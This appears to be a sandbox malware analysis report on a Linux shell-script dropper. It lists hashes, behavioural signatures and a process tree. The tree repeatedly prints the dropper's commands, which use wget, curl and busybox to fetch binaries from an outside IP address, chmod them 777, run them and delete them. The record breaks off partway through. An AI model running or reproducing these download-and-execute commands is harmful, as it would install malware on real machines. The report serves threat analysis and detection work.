Analysis
-
max time kernel
27s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
-
Size
10KB
-
MD5
766dedc13963c6b6ee0d4904bf619106
-
SHA1
3b93a1c4a9df4d54c75ef3b445ca55244506866c
-
SHA256
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264
-
SHA512
708c383986fa3596893356ad7ced7c503f4bdab762a319ff71291af63bf23e29ce72ae833bc4f47293c9031f7b78bc55a6a61f9d67585f39fb2412103eb6875b
-
SSDEEP
192:jbYbCQCoCnCuCKCzIkq3VdEZ1KVdEZ1PCQCoCnCuCKCEt:/YbCQCoCnCuCKCzIkqWCQCoCnCuCKCQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1615 chmod 1657 chmod 1495 chmod 1549 chmod 1579 chmod 1585 chmod 1651 chmod 1519 chmod 1531 chmod 1543 chmod 1573 chmod 1597 chmod 1507 chmod 1591 chmod 1645 chmod 1513 chmod 1525 chmod 1567 chmod 1609 chmod 1627 chmod 1639 chmod 1561 chmod 1603 chmod 1501 chmod 1537 chmod 1555 chmod 1621 chmod 1633 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW 1496 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc 1502 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt 1508 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 1514 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT 1520 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal 1526 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 1532 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 1538 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV 1544 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB 1550 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF 1556 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U 1562 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES 1568 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB 1574 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB 1580 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal 1586 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 1592 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 1598 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV 1604 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U 1610 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF 1616 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB 1622 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES 1628 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT 1634 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW 1640 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc 1646 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt 1652 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 1658 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB curl File opened for modification /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt curl File opened for modification /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt curl File opened for modification /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U curl File opened for modification /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc curl File opened for modification /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 curl File opened for modification /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT curl File opened for modification /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal curl File opened for modification /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW curl File opened for modification /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal curl File opened for modification /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 curl File opened for modification /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 curl File opened for modification /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV curl File opened for modification /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB curl File opened for modification /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB curl File opened for modification /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 curl File opened for modification /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U curl File opened for modification /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF curl File opened for modification /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 curl File opened for modification /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES curl File opened for modification /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT curl File opened for modification /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc curl File opened for modification /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES curl File opened for modification /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF curl File opened for modification /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV curl File opened for modification /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW curl File opened for modification /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 curl File opened for modification /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB curl
Processes
-
/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh1⤵PID:1486
-
/bin/rm/bin/rm bins.sh2⤵PID:1487
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1488
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Writes file to tmp directory
PID:1493
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1494
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:1495
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:1496
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1497
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1498
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1500
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:1501
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:1502
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1503
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1504
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1506
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:1508
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1512
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1518
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1524
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1530
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1536
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1542
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1548
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1554
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1560
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1566
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1572
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1578
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1584
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1590
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1596
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1602
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1608
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1614
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1620
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1626
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:1628
-
-
